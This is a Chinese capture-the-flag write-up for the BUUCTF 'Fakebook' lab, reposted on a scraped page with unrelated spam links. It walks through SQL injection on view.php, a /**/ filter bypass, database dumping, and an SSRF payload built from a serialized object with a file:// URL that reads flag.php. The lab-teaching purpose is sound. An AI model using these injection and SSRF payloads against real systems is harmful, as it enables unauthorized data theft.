当前位置: 首页 > wzjs >正文

苏州知名网站制作西安做网站报价

wzjs 2025/9/1 19:57:51
苏州知名网站制作,西安做网站报价,wordpress 设置文章模板,规划电子商务网站流程BUUCTF——Fakebook 1 进入靶场 有两个功能点 login 测试了一下弱口令和万能密码 没啥用 join 增加个用户试试 居然创建成功了 我还想着admin越权 扫目录发现一个robots.txt 在robots.txt里发现一个user.php.bak的url 拼接下载 <?phpclass UserInfo {public $name …

BUUCTF——Fakebook 1

进入靶场

在这里插入图片描述

有两个功能点

login

在这里插入图片描述

测试了一下弱口令和万能密码

没啥用

join

在这里插入图片描述

增加个用户试试

在这里插入图片描述

居然创建成功了

在这里插入图片描述

我还想着admin越权

扫目录发现一个robots.txt

在robots.txt里发现一个user.php.bak的url

拼接下载

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}

点击进入admin

在这里插入图片描述

发现一个no传参

尝试sql注入

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=1--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=2--+

在这里插入图片描述

看来有注入点

直接上sqlmap神器看看

很遗憾没梭出来

在这里插入图片描述

还是手注吧

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 order by 5--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union select database(),2,3,4--+

在这里插入图片描述

坏了,被过滤了

得想想办法绕过

试了好多方法都绕不过去

看了一下其他师傅的文章

原来是过滤了union select

用/**/绕过

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%20database(),2,3,4--+

在这里插入图片描述

在第二列

爆库

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,database(),3,4--+

在这里插入图片描述

爆表

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

在这里插入图片描述

继续

爆列

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'

在这里插入图片描述

爆字段

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users

在这里插入图片描述

根据之前下载的代码发现可能存在ssrf漏洞

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:3:%22123%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

查看源代码

拿到flag

在这里插入图片描述

在这里插入图片描述

flag{c016e06b-12fb-4b33-80f9-84888834e1bc}

下播!

在这里插入图片描述

http://www.dtcms.com/wzjs/572756.html

相关文章:

  • 网站登录记录怎么删除周口网络推广哪家好
  • 网站程序代码昆明网站建站
  • 连锁连锁酒店网站建设方案响应式网站 哪些
  • 网站安装php020网站开发多少钱
  • 做网站放广告赚钱网站优化查询代码
  • excel动态表格图表制作优化设计六年级上册语文答案
  • 佛山专业网站建设哪家好wordpress 免费电商主题
  • 企业网站建设一般原则青岛信息网
  • 凡科建站免费dede视频网站源码
  • 网站首页如何做浮动窗口众筹网站建设报价
  • 企业网站建设收费标准无锡网站建设培训班
  • 网站建设负责那内容上传吗注册登记
  • 信誉好的广州做网站电商网站怎么做聚合
  • 做网站报价网站上线盈利
  • 宁波城乡住房建设厅网站镇海建设交通局网站首页
  • 搜索网站排名软件上海网站开发与设
  • 无锡建设主管部门网站WordPress jwt
  • 师德师风建设网站济南公司网站推广优化最大的
  • 网站数据库购买建设银行官方网站个人系统板块
  • 网站推广方案设计郑州外贸网站建设公司价格
  • 做的最好的门户网站旅游网站建设设计公司
  • 福建网站建设科技有限公司站长seo软件
  • 司法行政网站建设目的凡科网站产品导航怎么做
  • 怎么建立自己网站视频做机械一般做那个外贸网站
  • 一级a做爰片免费的网站有吗电子商务网站建设的试卷
  • 外卖网站那家做的好别人买了域名做违法网站
  • 项目网站建设应入哪个科目直播系统开发公司
  • 在本地做改版如何替换旧网站会影响百度收录吗响应式网站 尺寸
  • 网站推广软文欣赏网站群建设座谈会
  • 网站建设书案例办公室设计布局平面图